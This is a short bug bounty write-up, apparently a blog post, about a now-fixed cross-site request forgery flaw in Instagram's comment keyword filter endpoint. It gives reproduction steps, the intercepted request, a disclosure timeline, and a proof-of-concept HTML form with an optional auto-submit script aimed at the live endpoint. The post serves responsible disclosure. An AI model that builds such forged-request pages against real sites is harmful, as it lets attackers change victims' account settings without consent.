CSRF in Instagram

Mohamed Laajimi
2 min readNov 23, 2021

--

Description/Impact:

An attacker was able to change comment keyword filter on behalf of other users on Instagram.com by exploiting CSRF vulnerability .but after reporting this vulnerability the internal research of facebook found other vulnerable endpoint which might lead to account takover

Reproduction steps:

Step1:open https://www.instagram.com/accounts/comment_filter/

Step2:add any keyword and intercept the request

POST /accounts/set_comment_filter_keywords_web/ HTTP/1.1

Host:www.instagram.com

In the request there is an interesting header X-CSRFTOKEN this header verify if the request is coming from owner of account

when deleting this header the request will be send successfully and get the response

HTTP 200 OK

status { ok}

Here we can notice there no check of CSRF token

Step3: write the exploit of this vulnerability

<html>

<head>

<title>exploit csrf</title>

</head>

<body>

<form action="https://www.instagram.com/accounts/set_comment_filter_keywords_web/" method="POST">

<input type="hidden" name="keywords" value="test" />

<input type="submit" value="Submit request" />

</form>

</body>

</html>

You can also include auto submit script

<script>

document.forms[0].submit

</script>

Here we can notice there is no check of X-CSRFTOKEN and Origin

After fixing the initially reported bug, the further internal research identified other vulnerable endpoints

Timeline:

16/01/2021:I sent report

19/01/2021:Acknowledged by facebook

22/02/2021: fixed&bounty awarded

--

--

Mohamed Laajimi
Mohamed Laajimi

Responses (8)